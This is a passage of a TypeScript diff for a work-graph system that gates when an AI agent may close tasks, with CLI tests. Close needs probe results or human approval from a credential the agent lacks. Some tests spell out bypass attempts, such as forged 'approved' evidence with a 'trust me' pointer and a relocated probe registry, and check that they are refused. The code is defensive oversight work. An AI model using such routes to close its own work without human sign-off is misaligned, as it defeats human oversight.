+ * - `body` — the human-readable statement of the node. Doctrine puts the
+ *   question in the ticket body; without it a created node is a bare title.
+ * - `parent` — where the node attaches. `soma graph add <root>` (§2.6) and the
+ *   orienteer rule "scaffold nodes attach below their spawning ticket" (#492)
+ *   both need it, and `listCandidateFrontier(root)` needs the membership edge
+ *   it writes.
+ */
+export type CreateNodeSpec = DistributiveOmit<WorkGraphNode, "id"> & {
+  body?: string;
+  parent?: NodeRef;
+};
+
+/** A blocker as seen from the blocked node — status included so the frontier needs no second fetch. */
+export interface BlockingRef extends NodeRef {
+  status: NodeStatus;
+}
+
+export type NodeStatus = "open" | "closed";
+
+/** A node as the store currently reports it. */
+export interface NodeState {
+  ref: NodeRef;
+  node: WorkGraphNode;
+  status: NodeStatus;
+  assignees: readonly string[];
+  blockedBy: readonly BlockingRef[];
+  /** Read from the backend's API author field, never from body text (§3.2 conjunct 3). */
+  author: string;
+  parent?: NodeRef;
+  body?: string;
+  url?: string;
+  /**
+   * False when the backing issue carries no typed node block — a hand-authored
+   * ticket. Such a node is reported fail-safe as `approve` with no probes: the
+   * most-gated class, never `auto`, since nothing declared its probes.
+   */
+  typed: boolean;
+  /** Set when a typed block was present but unreadable. Visible state, never a silent downgrade. */
+  parseError?: string;
+}
+
+/**
+ * Outcome of a claim attempt after the store's post-write re-read (§2.4).
+ * `held` is the question every caller actually asks; `holder` names the winner
+ * when it is someone else.
+ */
+export interface ClaimResult {
+  held: boolean;
+  identity: string;
+  holder: string | null;
+  assignees: readonly string[];
+}
+
+export interface CommentRef {
+  id: string;
+  nodeId: string;
+  author?: string;
+  url?: string;
+}
+
+export interface Reaction {
+  id: string;
+  content: string;
+  /** API author field (§2.5) — never parsed out of body text. */
+  author: string;
+  createdAt?: string;
+}
+
+/**
+ * Close evidence vocabulary. Extends the repo's {@link EvidenceKind} with the
+ * two the graph spec names: `judged` (a model's opinion — informs, never
+ * decides, §1 clause 4) and `approved` (an attestation from a credential the
+ * agent does not hold, §3.2).
+ */
+export type WorkGraphEvidenceKind = EvidenceKind | "judged" | "approved";
+
+export interface CloseEvidence {
+  kind: WorkGraphEvidenceKind;
+  summary: string;
+  /** Externally checkable pointer: commit sha, CI run URL, comment id, probe output location. */
+  pointer?: string;
+}
+
+export type AttestationState = "verified" | "unverified";
+
+/** Backend capability (§2.5): CAN receipts be independently attested here? Necessary, never sufficient. */
+export type AttestationCapability = "verifiable" | "unverified";
+
+/**
+ * The facts a receipt records, not just the verdict (§3.2). Every input except
+ * the confinement result is re-derivable from the tracker indefinitely; the
+ * session's credential topology is not, so an unrecorded check leaves a future
+ * reader unable to tell *why* a receipt was unverified.
+ *
+ * Populated by the verb layer, which owns the derivation rule (#498, gated on
+ * #502). The contract layer stores and renders it.
+ */
+export interface AttestationFacts {
+  backendCapability: AttestationCapability;
+  confinement?: {
+    checked: boolean;
+    reachableIdentities: readonly string[];
+    at: string;
+  };
+  proposal?: { commentId: string; author: string };
+  ratification?: { kind: "reaction" | "comment"; id: string; author: string };
+  root?: { nodeId: string; author: string };
+}
+
+export interface CloseReceipt {
+  /** Must match the node's attached checkpoint — one work item, one completion gate. */
+  checkpointId: string;
+  closedBy: string;
+  /** ISO timestamp. */
+  at: string;
+  evidence: readonly CloseEvidence[];
+  probeResults: readonly ProbeResult[];
+  attestation: AttestationState;
+  attestationFacts?: AttestationFacts;
+}
+
+/**
+ * The store seam (§2.5): pure I/O, no contract logic. The tracker is the *sole*
+ * authoritative store for topology, claims, and status; soma-home holds at most
+ * a disposable derived cache and `nodeId` references, and no sync contract
+ * exists (#491).
+ *
+ * A graph records its backend at creation and lives there forever; moving is a
+ * one-way export into a fresh graph.
+ */
+export interface GraphStore {
+  /** Backend capability, not a per-receipt verdict — see {@link AttestationCapability}. */
+  readonly attestation: AttestationCapability;
+  /** Store assigns the id. Callers reach this through {@link WorkGraph.createNode}, which validates first. */
+  createNode(spec: CreateNodeSpec): Promise<NodeRef>;
+  addBlockingEdge(blocker: NodeRef, blocked: NodeRef): Promise<void>;
+  readNode(ref: NodeRef): Promise<NodeState>;
+  /** Candidates only — hits are re-confirmed by {@link WorkGraph.frontier} via direct fetch. */
+  listCandidateFrontier(root: NodeRef): Promise<NodeRef[]>;
+  /** Assigns, then re-reads (no compare-and-swap exists on GitHub) and applies {@link resolveClaimRace}. */
+  claim(ref: NodeRef, identity: string): Promise<ClaimResult>;
+  postComment(ref: NodeRef, body: string): Promise<CommentRef>;
+  readCommentReactions(ref: CommentRef): Promise<Reaction[]>;
+  close(ref: NodeRef, receipt: CloseReceipt): Promise<void>;
+}
+
+export type WorkGraphErrorCode =
+  | "invalid-node"
+  | "invalid-probe"
+  | "invalid-edge"
+  | "cycle"
+  | "node-closed"
+  | "close-refused"
+  /** The backend failed or answered in a shape the store cannot read. */
+  | "backend";
+
+export class WorkGraphError extends Error {
+  readonly code: WorkGraphErrorCode;
+
+  constructor(code: WorkGraphErrorCode, message: string) {
+    super(message);
+    this.name = "WorkGraphError";
+    this.code = code;
+  }
+}
+
+// ---------------------------------------------------------------------------
+// Parsing — the authoritative barrier at the store boundary (§2.1)
+// ---------------------------------------------------------------------------
+
+function asRecord(value: unknown, code: WorkGraphErrorCode, context: string): Record<string, unknown> {
+  if (typeof value !== "object" || value === null || Array.isArray(value)) {
+    throw new WorkGraphError(code, `${context} must be an object`);
+  }
+  return value as Record<string, unknown>;
+}
+
+function requireString(record: Record<string, unknown>, key: string, code: WorkGraphErrorCode, context: string): string {
+  const value = record[key];
+  if (typeof value !== "string" || value.trim().length === 0) {
+    throw new WorkGraphError(code, `${context}: "${key}" must be a non-empty string`);
+  }
+  return value.trim();
+}
+
+function optionalString(record: Record<string, unknown>, key: string, code: WorkGraphErrorCode, context: string): string | undefined {
+  const value = record[key];
+  if (value === undefined || value === null) return undefined;
+  if (typeof value !== "string" || value.trim().length === 0) {
+    throw new WorkGraphError(code, `${context}: "${key}" must be a non-empty string when present`);
+  }
+  return value.trim();
+}
+
+function requireInteger(record: Record<string, unknown>, key: string, code: WorkGraphErrorCode, context: string): number {
+  const value = record[key];
+  if (typeof value !== "number" || !Number.isInteger(value)) {
+    throw new WorkGraphError(code, `${context}: "${key}" must be an integer`);
+  }
+  return value;
+}
+
+function requirePositiveNumber(record: Record<string, unknown>, key: string, code: WorkGraphErrorCode, context: string): number {
+  const value = record[key];
+  if (typeof value !== "number" || !Number.isFinite(value) || value <= 0) {
+    throw new WorkGraphError(code, `${context}: "${key}" must be a positive finite number`);
+  }
+  return value;
+}
+
+/**
+ * Normalize a work-kind: absent stays absent, present is trimmed + lowercased,
+ * empty-after-trim is rejected (§2.1). Form only — the runtime never reads the
+ * meaning.
+ */
+export function normalizeKind(kind: unknown): string | undefined {
+  if (kind === undefined || kind === null) return undefined;
+  if (typeof kind !== "string") {
+    throw new WorkGraphError("invalid-node", `"kind" must be a string when present`);
+  }
+  const normalized = kind.trim().toLowerCase();
+  if (normalized.length === 0) {
+    throw new WorkGraphError("invalid-node", `"kind" must not be empty after trimming`);
+  }
+  return normalized;
+}
+
+/** Parse one probe from untrusted input. One switch on `type`, no nested discriminants. */
+export function parseProbe(input: unknown): Probe {
+  const record = asRecord(input, "invalid-probe", "probe");
+  const type = record.type;
+  switch (type) {
+    case "command": {
+      const cwd = optionalString(record, "cwd", "invalid-probe", "command probe");
+      return {
+        type,
+        run: requireString(record, "run", "invalid-probe", "command probe"),
+        ...(cwd === undefined ? {} : { cwd }),
+        timeoutSec: requirePositiveNumber(record, "timeoutSec", "invalid-probe", "command probe"),
+        expectExit: requireInteger(record, "expectExit", "invalid-probe", "command probe"),
+      };
+    }
+    case "url": {
+      const expectStatus = requireInteger(record, "expectStatus", "invalid-probe", "url probe");
+      if (expectStatus < 100 || expectStatus > 599) {
+        throw new WorkGraphError("invalid-probe", `url probe: "expectStatus" must be a valid HTTP status`);
+      }
+      return { type, target: requireString(record, "target", "invalid-probe", "url probe"), expectStatus };
+    }
+    case "git-ref-exists": {
+      const repo = optionalString(record, "repo", "invalid-probe", "git-ref-exists probe");
+      return {
+        type,
+        ref: requireString(record, "ref", "invalid-probe", "git-ref-exists probe"),
+        ...(repo === undefined ? {} : { repo }),
+      };
+    }
+    case "git-merged-into": {
+      const repo = optionalString(record, "repo", "invalid-probe", "git-merged-into probe");
+      return {
+        type,
+        ref: requireString(record, "ref", "invalid-probe", "git-merged-into probe"),
+        into: requireString(record, "into", "invalid-probe", "git-merged-into probe"),
+        ...(repo === undefined ? {} : { repo }),
+      };
+    }
+    case "artifact-exists": {
+      const atRef = optionalString(record, "atRef", "invalid-probe", "artifact-exists probe");
+      const repo = optionalString(record, "repo", "invalid-probe", "artifact-exists probe");
+      return {
+        type,
+        path: requireString(record, "path", "invalid-probe", "artifact-exists probe"),
+        ...(atRef === undefined ? {} : { atRef }),
+        ...(repo === undefined ? {} : { repo }),
+      };
+    }
+    default:
+      throw new WorkGraphError("invalid-probe", `unknown probe type: ${JSON.stringify(type)}`);
+  }
+}
+
+function parseBudget(input: unknown): NodeBudget {
+  const record = asRecord(input, "invalid-node", "budget");
+  const budget: NodeBudget = {};
+  for (const key of ["tokens", "agentInvocations", "wallClockMin"] as const) {
+    if (record[key] === undefined || record[key] === null) continue;
+    budget[key] = requirePositiveNumber(record, key, "invalid-node", "budget");
+  }
+  if (Object.keys(budget).length === 0) {
+    throw new WorkGraphError("invalid-node", `budget must declare at least one cap`);
+  }
+  return budget;
+}
+
+function parseAutonomy(value: unknown): WorkGraphAutonomy {
+  if (value === "auto" || value === "propose" || value === "approve") return value;
+  throw new WorkGraphError("invalid-node", `"autonomy" must be one of auto | propose | approve`);
+}
+
+function parseProbes(value: unknown): Probe[] {
+  if (value === undefined || value === null) return [];
+  if (!Array.isArray(value)) {
+    throw new WorkGraphError("invalid-probe", `"probes" must be an array when present`);
+  }
+  return value.map((entry) => parseProbe(entry));
+}
+
+/**
+ * Validate an untrusted node spec at the store boundary. This — not the TS
+ * tuple type — is what makes an `auto` node without probes impossible (§2.1).
+ */
+export function parseNodeSpec(input: unknown): CreateNodeSpec {
+  const record = asRecord(input, "invalid-node", "node spec");
+  if ("id" in record && record.id !== undefined) {
+    throw new WorkGraphError("invalid-node", `"id" is assigned by the store — never caller-supplied`);
+  }
+
+  const title = requireString(record, "title", "invalid-node", "node spec");
+  const autonomy = parseAutonomy(record.autonomy);
+  const kind = normalizeKind(record.kind);
+  const checkpointId = optionalString(record, "checkpointId", "invalid-node", "node spec");
+  const budget = record.budget === undefined || record.budget === null ? undefined : parseBudget(record.budget);
+  const body = optionalString(record, "body", "invalid-node", "node spec");
+  const parentId = record.parent === undefined || record.parent === null
+    ? undefined
+    : requireString(asRecord(record.parent, "invalid-node", "node spec: parent"), "id", "invalid-node", "node spec: parent");
+  const probes = parseProbes(record.probes);
+
+  const base = {
+    title,
+    ...(kind === undefined ? {} : { kind }),
+    ...(checkpointId === undefined ? {} : { checkpointId }),
+    ...(budget === undefined ? {} : { budget }),
+    ...(body === undefined ? {} : { body }),
+    ...(parentId === undefined ? {} : { parent: { id: parentId } }),
+  };
+
+  if (autonomy === "auto") {
+    if (probes.length === 0) {
+      throw new WorkGraphError(
+        "invalid-node",
+        `an "auto" node needs at least one probe — zero probes means zero machine-checkable evidence at close`,
+      );
+    }
+    return { ...base, autonomy, probes: probes as [Probe, ...Probe[]] };
+  }
+
+  return { ...base, autonomy, ...(probes.length === 0 ? {} : { probes }) };
+}
+
+/** Attach a store-assigned id to a validated spec, yielding the node proper. */
+export function toNode(id: string, spec: CreateNodeSpec): WorkGraphNode {
+  if (spec.autonomy === "auto") {
+    const { body: _body, parent: _parent, ...rest } = spec;
+    return { ...rest, id };
+  }
+  const { body: _body, parent: _parent, ...rest } = spec;
+  return { ...rest, id };
+}
+
+// ---------------------------------------------------------------------------
+// Claim semantics (§2.4)
+// ---------------------------------------------------------------------------
+
+/**
+ * The deterministic tie-break every racer computes over the same eventual
+ * assignee set (#492 correction 2): the login sorting first by code point holds
+ * the claim; every other claimant removes itself. The race converges to one
+ * holder without coordination.
+ *
+ * Code-point comparison, not `localeCompare` — a locale-dependent order would
+ * let two machines disagree about the winner, which is exactly the coordination
+ * the rule exists to avoid.
+ */
+export function resolveClaimRace(identity: string, assignees: readonly string[]): { held: boolean; holder: string | null } {
+  if (assignees.length === 0) return { held: false, holder: null };
+  let winner = assignees[0];
+  for (const candidate of assignees) {
+    if (candidate < winner) winner = candidate;
+  }
+  return { held: winner === identity, holder: winner };
+}
+
+// ---------------------------------------------------------------------------
+// Close gating (§2.1 required-by-close, §3.1/§3.2 admissible evidence)
+// ---------------------------------------------------------------------------
+
+/**
+ * Evidence the agent cannot author by itself, per autonomy class:
+ * `auto` closes on machine-checkable observation, HITL closes on an attestation
+ * from a credential the agent does not hold (§3.2). `judged` and `specified`
+ * never qualify — a model's opinion informs, never decides (§1 clause 4).
+ */
+export function agentExternalEvidenceKinds(autonomy: WorkGraphAutonomy): readonly WorkGraphEvidenceKind[] {
+  return autonomy === "auto" ? ["probed", "tested"] : ["approved"];
+}
+
+/** Canonical identity of a probe, used to pair declared probes with their results. */
+function probeKey(probe: Probe): string {
+  switch (probe.type) {
+    case "command":
+      return `command:${probe.run}|${probe.cwd ?? ""}|${probe.timeoutSec}|${probe.expectExit}`;
+    case "url":
+      return `url:${probe.target}|${probe.expectStatus}`;
+    case "git-ref-exists":
+      return `git-ref-exists:${probe.ref}|${probe.repo ?? ""}`;
+    case "git-merged-into":
+      return `git-merged-into:${probe.ref}|${probe.into}|${probe.repo ?? ""}`;
+    case "artifact-exists":
+      return `artifact-exists:${probe.path}|${probe.atRef ?? ""}|${probe.repo ?? ""}`;
+  }
+}
+
+/**
+ * The hollow-close refusal. Throws unless:
+ *
+ * 1. the node has an attached checkpoint and the receipt names it — a node
+ *    closes only through its checkpoint's completion gate (§2.1, §2.6);
+ * 2. every declared probe was actually run and passed — `specified` is a
+ *    declaration, `probed` is a fact (§2.2);
+ * 3. at least one agent-external evidence entry carries a pointer someone else
+ *    can check (§3.1) — what makes the receipt re-auditable by the phase-2
+ *    auditor rather than a self-report.
+ *
+ * `attestation` is deliberately **not** gated on: refusing on `unverified`
+ * would deadlock the bootstrap, since the nodes that establish credential
+ * separation are themselves `approve`-class (§3.2).
+ */
+export function assertClosable(node: WorkGraphNode, receipt: CloseReceipt): void {
+  const checkpointId = node.checkpointId;
+  if (checkpointId === undefined || checkpointId.length === 0) {
+    throw new WorkGraphError(
+      "close-refused",
+      `node ${node.id} has no attached checkpoint — a node closes only through its checkpoint's completion gate`,
+    );
+  }
+  if (receipt.checkpointId !== checkpointId) {
+    throw new WorkGraphError(
+      "close-refused",
+      `receipt names checkpoint ${receipt.checkpointId}, node ${node.id} is gated by ${checkpointId}`,
+    );
+  }
+
+  const results = new Map(receipt.probeResults.map((result) => [probeKey(result.probe), result]));
+  for (const probe of node.probes ?? []) {
+    const result = results.get(probeKey(probe));
+    if (result === undefined || result.state === "specified") {
+      throw new WorkGraphError(
+        "close-refused",
+        `probe ${probeKey(probe)} on node ${node.id} was specified but never probed`,
+      );
+    }
+    if (result.outcome !== "pass") {
+      throw new WorkGraphError("close-refused", `probe ${probeKey(probe)} on node ${node.id} ran and failed`);
+    }
+  }
+
+  const admissible = agentExternalEvidenceKinds(node.autonomy);
+  const external = receipt.evidence.filter(
+    (entry) => admissible.includes(entry.kind) && entry.summary.trim().length > 0 && (entry.pointer ?? "").trim().length > 0,
+  );
+  if (external.length === 0) {
+    throw new WorkGraphError(
+      "close-refused",
+      `node ${node.id} (${node.autonomy}) needs at least one ${admissible.join(" or ")} evidence entry with an externally checkable pointer`,
+    );
+  }
+}
+
+/** Render the receipt as the close comment body (§5: checkpoint id + evidence pointers on the tracker). */
+export function renderCloseReceipt(receipt: CloseReceipt): string {
+  const lines: string[] = [
+    `## Close receipt`,
+    ``,
+    `- **checkpoint:** \`${receipt.checkpointId}\``,
+    `- **closed by:** ${receipt.closedBy}`,
+    `- **at:** ${receipt.at}`,
+    `- **attestation:** \`${receipt.attestation}\``,
+    ``,
+    `### Evidence`,
+    ``,
+  ];
+  for (const entry of receipt.evidence) {
+    lines.push(`- \`${entry.kind}\` — ${entry.summary}${entry.pointer === undefined ? "" : ` (${entry.pointer})`}`);
+  }
+  if (receipt.probeResults.length > 0) {
+    lines.push(``, `### Probes`, ``);
+    for (const result of receipt.probeResults) {
+      lines.push(
+        result.state === "probed"
+          ? `- \`${probeKey(result.probe)}\` — **${result.outcome}** at ${result.at}: ${result.observed}`
+          : `- \`${probeKey(result.probe)}\` — specified, not run`,
+      );
+    }
+  }
+  if (receipt.attestationFacts !== undefined) {
+    lines.push(``, `### Attestation facts`, ``, "```json", JSON.stringify(receipt.attestationFacts, null, 2), "```");
+  }
+  return lines.join("\n");
+}
+
+// ---------------------------------------------------------------------------
+// Contract layer
+// ---------------------------------------------------------------------------
+
+/**
+ * The rules, over any {@link GraphStore}. Verbs (`soma graph …`, #498) call
+ * this; nothing here knows what a tracker is.
+ */
+export class WorkGraph {
+  private readonly store: GraphStore;
+
+  constructor(store: GraphStore) {
+    this.store = store;
+  }
+
+  /** Backend capability, not a receipt verdict (§2.5). */
+  get attestation(): AttestationCapability {
+    return this.store.attestation;
+  }
+
+  /** Validate at the boundary, then create. Additive mutation — free after structural validation (§1 clause 2). */
+  async createNode(spec: unknown): Promise<NodeRef> {
+    return await this.store.createNode(parseNodeSpec(spec));
+  }
+
+  async readNode(ref: NodeRef): Promise<NodeState> {
+    return await this.store.readNode(ref);
+  }
+
+  /**
+   * Add `blocks(blocker, blocked)` after the structural validation §1 clause 2
+   * requires. The graph is a DAG: an edge that would close a cycle is rejected,
+   * because `blocks(a,b)` + `blocks(b,a)` removes both nodes from the frontier
+   * forever — no claim, no close, no error (§2.3).
+   */
+  async addBlockingEdge(blocker: NodeRef, blocked: NodeRef): Promise<void> {
+    if (blocker.id === blocked.id) {
+      throw new WorkGraphError("invalid-edge", `node ${blocker.id} cannot block itself`);
+    }
+    if (await this.reaches(blocker, blocked.id)) {
+      throw new WorkGraphError(
+        "cycle",
+        `blocks(${blocker.id}, ${blocked.id}) would close a cycle — ${blocked.id} already blocks ${blocker.id} transitively`,
+      );
+    }
+    await this.store.addBlockingEdge(blocker, blocked);
+  }
+
+  /** Walk blockers upward from `start`, looking for `targetId`. Visited-guarded against pre-existing cycles. */
+  private async reaches(start: NodeRef, targetId: string): Promise<boolean> {
+    const seen = new Set<string>([start.id]);
+    const queue: NodeRef[] = [start];
+    // The array iterator re-reads `length` each step, so nodes pushed below are
+    // visited in this same loop — a breadth-first walk over a growing queue.
+    for (const current of queue) {
+      const state = await this.store.readNode(current);
+      for (const blocker of state.blockedBy) {
+        if (blocker.id === targetId) return true;
+        if (seen.has(blocker.id)) continue;
+        seen.add(blocker.id);
+        queue.push({ id: blocker.id });
+      }
+    }
+    return false;
+  }
+
+  /**
+   * Frontier = open ∧ unassigned ∧ all blockers closed (§2.4). Every candidate
+   * is confirmed by direct fetch, removing false positives from lagging tracker
+   * search indexes. False *negatives* are not recoverable this way — the
+   * frontier is advisory and may return short, self-healing on a later tick.
+   * Correctness rests on the claim and close gates, never on frontier
+   * completeness.
+   *
+   * Known fail-open path (phase 1): "blockers closed" derives purely from
+   * tracker status, so a blocker hand-closed via raw tracker writes releases
+   * its dependents without any checkpoint gate having run. Accepted in phase 1,
+   * detected by the phase-2 auditor.
+   */
+  async frontier(root: NodeRef): Promise<NodeState[]> {
+    const candidates = await this.store.listCandidateFrontier(root);
+    const confirmed: NodeState[] = [];
+    const seen = new Set<string>();
+    for (const candidate of candidates) {
+      if (seen.has(candidate.id)) continue;
+      seen.add(candidate.id);
+      const state = await this.store.readNode(candidate);
+      if (state.status !== "open") continue;
+      if (state.assignees.length > 0) continue;
+      if (state.blockedBy.some((blocker) => blocker.status !== "closed")) continue;
+      confirmed.push(state);
+    }
+    return confirmed;
+  }
+
+  /**
+   * Claim = becoming the node's sole assignee, written before any work (§2.4).
+   * Refuses on a closed node: claiming what is already done is never the
+   * intent, and it would silently reopen the race on a settled receipt.
+   */
+  async claim(ref: NodeRef, identity: string): Promise<ClaimResult> {
+    const state = await this.store.readNode(ref);
+    if (state.status === "closed") {
+      throw new WorkGraphError("node-closed", `node ${ref.id} is closed — nothing to claim`);
+    }
+    return await this.store.claim(ref, identity);
+  }
+
+  async postComment(ref: NodeRef, body: string): Promise<CommentRef> {
+    return await this.store.postComment(ref, body);
+  }
+
+  async readCommentReactions(ref: CommentRef): Promise<Reaction[]> {
+    return await this.store.readCommentReactions(ref);
+  }
+
+  /**
+   * Consuming mutation (§1 clause 2): gated by {@link assertClosable} against
+   * the node as the store currently reports it — never against a caller-supplied
+   * copy, which the agent authors.
+   */
+  async close(ref: NodeRef, receipt: CloseReceipt): Promise<void> {
+    const state = await this.store.readNode(ref);
+    if (state.status === "closed") {
+      throw new WorkGraphError("node-closed", `node ${ref.id} is already closed`);
+    }
+    assertClosable(state.node, receipt);
+    await this.store.close(ref, receipt);
+  }
+}

--- a/test/cli-graph.test.ts
+++ b/test/cli-graph.test.ts
@@ -1,6 +1,7 @@
 import { expect, test } from "bun:test";
 import { SomaCliError } from "../src/cli/errors";
 import {
+  GRAPH_COMMAND_HELP,
   parseGraphArgs,
   parseRepoFromRemote,
   runGraphCli,
@@ -574,6 +575,61 @@ test("--dry-run still renders the receipt when the registry refused a probe", as
   expect(output).toContain("would be REFUSED");
   expect(output).toContain("1 of 1 probe(s) refused");
   expect(output).toContain("## Close receipt");
+});
+
+test("--evidence cannot supply the kind that closes the node", async () => {
+  // The hole this closes: assertClosable counts any admissible-kind entry with a
+  // pointer and cannot tell derived from hand-written, so without a boundary
+  // check a caller closes an approve-class node with no proposal and no human.
+  const hitl = new FakeStore()
+    .seed("495", { node: autoNode("495"), author: "jcfischer" })
+    .seed("520", {
+      node: { id: "520", title: "hitl", autonomy: "approve", checkpointId: "cp-520" },
+      parent: "495",
+      author: "ivy-agent",
+    });
+
+  const forged = await failure(
+    ["graph", "close", "520", "--repo", REPO, "--evidence", '{"kind":"approved","summary":"looks fine","pointer":"trust me"}'],
+    hitl,
+  );
+  expect(forged).toContain("--evidence cannot carry `approved`");
+  expect(forged).toContain("ratified proposal comment");
+  expect(hitl.closed).toHaveLength(0);
+
+  // Same rule on the AFK side: `probed`/`tested` are what a passed probe earns.
+  const afk = autoGraph();
+  const selfReport = await failure(
+    ["graph", "close", "520", "--repo", REPO, "--evidence", '{"kind":"tested","summary":"ran it myself","pointer":"HEAD"}'],
+    afk,
+  );
+  expect(selfReport).toContain("--evidence cannot carry");
+  expect(afk.closed).toHaveLength(0);
+
+  // Informational kinds still pass through.
+  const informed = autoGraph();
+  await run(
+    ["graph", "close", "520", "--repo", REPO, "--evidence", '{"kind":"judged","summary":"sage reviewed","pointer":"pr#1"}'],
+    informed,
+  );
+  expect(informed.closed[0].receipt.evidence.some((entry) => entry.kind === "judged")).toBe(true);
+});
+
+test("close takes no flag that relocates the probe registry", async () => {
+  // A caller-selectable registry path is the hole the soma-home placement closes:
+  // point it at a file you just wrote and the exact-match authorises itself.
+  const store = autoGraph();
+  const message = await failure(["graph", "close", "520", "--repo", REPO, "--soma-home", "/tmp/mine"], store);
+
+  expect(message).toContain("Unknown option: --soma-home");
+  expect(store.closed).toHaveLength(0);
+  expect(GRAPH_COMMAND_HELP.subcommands.close).not.toContain("--soma-home");
+});
+
+test("--propose refuses --dry-run rather than posting under a preview flag", () => {
+  expect(() => parseGraphArgs(["graph", "close", "520", "--propose", "--body", "x", "--dry-run"])).toThrow(
+    /cannot be combined with --dry-run/u,
+  );
 });
 
 test("the gate is uniform — a HITL node is refused on the same terms as an auto one", async () => {

--- a/test/cli-graph.test.ts
+++ b/test/cli-graph.test.ts
@@ -626,6 +626,21 @@ test("close takes no flag that relocates the probe registry", async () => {
   expect(GRAPH_COMMAND_HELP.subcommands.close).not.toContain("--soma-home");
 });
 
+test("--propose refuses to publish a proposal on a node that cannot close", async () => {
+  const store = new FakeStore()
+    .seed("495", { node: autoNode("495"), author: "jcfischer" })
+    .seed("520", {
+      node: { id: "520", title: "no checkpoint", autonomy: "approve" },
+      parent: "495",
+      author: "ivy-agent",
+    });
+
+  const message = await failure(["graph", "close", "520", "--propose", "--body", "done", "--repo", REPO], store);
+
+  expect(message).toContain("no attached checkpoint");
+  expect(store.comments.size).toBe(0); // nothing published for a 👍 that could never be used
+});
+
 test("--propose refuses --dry-run rather than posting under a preview flag", () => {
   expect(() => parseGraphArgs(["graph", "close", "520", "--propose", "--body", "x", "--dry-run"])).toThrow(
     /cannot be combined with --dry-run/u,

--- a/test/cli-graph.test.ts
+++ b/test/cli-graph.test.ts
@@ -1,0 +1,524 @@
+import { expect, test } from "bun:test";
+import { SomaCliError } from "../src/cli/errors";
+import {
+  parseGraphArgs,
+  parseRepoFromRemote,
+  runGraphCli,
+  selectRatification,
+  type GraphCliDeps,
+} from "../src/cli/graph";
+import {
+  WorkGraphError,
+  type ClaimResult,
+  type CloseReceipt,
+  type CommentRef,
+  type CreateNodeSpec,
+  type GraphStore,
+  type NodeRef,
+  type NodeState,
+  type Probe,
+  type ProbeResult,
+  type Reaction,
+  type WorkGraphNode,
+} from "../src/index";
+
+const REPO = "the-metafactory/soma";
+const AT = new Date("2026-08-04T09:00:00.000Z");
+const PROBE: Probe = { type: "command", run: "bun test", timeoutSec: 600, expectExit: 0 };
+
+interface SeedNode {
+  node: WorkGraphNode;
+  status?: "open" | "closed";
+  assignees?: string[];
+  blockedBy?: { id: string; status: "open" | "closed" }[];
+  author?: string;
+  parent?: string;
+  typed?: boolean;
+  children?: string[];
+}
+
+class FakeStore implements GraphStore {
+  readonly attestation = "verifiable" as const;
+  readonly nodes = new Map<string, SeedNode>();
+  readonly comments = new Map<string, { author: string; body: string; nodeId: string }>();
+  readonly reactions = new Map<string, Reaction[]>();
+  readonly closed: { ref: NodeRef; receipt: CloseReceipt }[] = [];
+  readonly created: CreateNodeSpec[] = [];
+  readonly edges: [string, string][] = [];
+  claimResult: ClaimResult | undefined;
+  private nextId = 900;
+
+  seed(id: string, seed: SeedNode): this {
+    this.nodes.set(id, seed);
+    return this;
+  }
+
+  async createNode(spec: CreateNodeSpec): Promise<NodeRef> {
+    this.created.push(spec);
+    const id = String(this.nextId++);
+    this.nodes.set(id, { node: { ...spec, id } as WorkGraphNode });
+    return { id };
+  }
+
+  async addBlockingEdge(blocker: NodeRef, blocked: NodeRef): Promise<void> {
+    this.edges.push([blocker.id, blocked.id]);
+  }
+
+  async readNode(ref: NodeRef): Promise<NodeState> {
+    const seed = this.nodes.get(ref.id);
+    if (seed === undefined) throw new WorkGraphError("backend", `no such node ${ref.id}`);
+    return {
+      ref: { id: ref.id },
+      node: seed.node,
+      status: seed.status ?? "open",
+      assignees: seed.assignees ?? [],
+      blockedBy: seed.blockedBy ?? [],
+      author: seed.author ?? "jcfischer",
+      typed: seed.typed ?? true,
+      ...(seed.parent === undefined ? {} : { parent: { id: seed.parent } }),
+    };
+  }
+
+  async listCandidateFrontier(root: NodeRef): Promise<NodeRef[]> {
+    return (this.nodes.get(root.id)?.children ?? []).map((id) => ({ id }));
+  }
+
+  async claim(_ref: NodeRef, identity: string): Promise<ClaimResult> {
+    return this.claimResult ?? { held: true, identity, holder: identity, assignees: [identity] };
+  }
+
+  async postComment(ref: NodeRef, body: string): Promise<CommentRef> {
+    const id = `c${this.comments.size + 1}`;
+    this.comments.set(id, { author: "ivy-agent", body, nodeId: ref.id });
+    return { id, nodeId: ref.id, author: "ivy-agent", url: `https://github.test/c/${id}` };
+  }
+
+  async readComment(ref: CommentRef): Promise<CommentRef> {
+    const comment = this.comments.get(ref.id);
+    if (comment === undefined) throw new WorkGraphError("backend", `no such comment ${ref.id}`);
+    return { id: ref.id, nodeId: comment.nodeId, author: comment.author, url: `https://github.test/c/${ref.id}` };
+  }
+
+  async readCommentReactions(ref: CommentRef): Promise<Reaction[]> {
+    return this.reactions.get(ref.id) ?? [];
+  }
+
+  async close(ref: NodeRef, receipt: CloseReceipt): Promise<void> {
+    this.closed.push({ ref, receipt });
+  }
+}
+
+function deps(store: FakeStore, overrides: Partial<GraphCliDeps> = {}): Partial<GraphCliDeps> {
+  return {
+    createStore: () => store,
+    resolveRepo: async () => REPO,
+    resolveIdentity: async () => "ivy-agent",
+    runProbes: async (probes) =>
+      probes.map<ProbeResult>((probe) => ({
+        probe,
+        state: "probed",
+        outcome: "pass",
+        observed: "exit 0",
+        at: AT.toISOString(),
+      })),
+    checkConfinement: async () => ({
+      checked: true,
+      reachableIdentities: ["ivy-agent"],
+      at: AT.toISOString(),
+      probes: [],
+    }),
+    evidencePointer: async () => "HEAD abc1234",
+    readTextFile: async () => "proposal body",
+    now: () => AT,
+    warn: () => undefined,
+    fromDevTree: false,
+    ...overrides,
+  };
+}
+
+async function run(args: string[], store: FakeStore, overrides: Partial<GraphCliDeps> = {}): Promise<string> {
+  return await runGraphCli(parseGraphArgs(args), deps(store, overrides));
+}
+
+async function failure(args: string[], store: FakeStore, overrides: Partial<GraphCliDeps> = {}): Promise<string> {
+  try {
+    await run(args, store, overrides);
+  } catch (error) {
+    return error instanceof Error ? error.message : String(error);
+  }
+  return "no-throw";
+}
+
+function autoNode(id: string, overrides: Partial<WorkGraphNode> = {}): WorkGraphNode {
+  return { id, title: `node ${id}`, autonomy: "auto", probes: [PROBE], checkpointId: `cp-${id}`, ...overrides } as WorkGraphNode;
+}
+
+// --- parsing ---------------------------------------------------------------
+
+test("the parser accepts exactly the five verbs of §2.6", () => {
+  for (const action of ["frontier", "node", "claim", "add", "close"]) {
+    const parsed = parseGraphArgs(
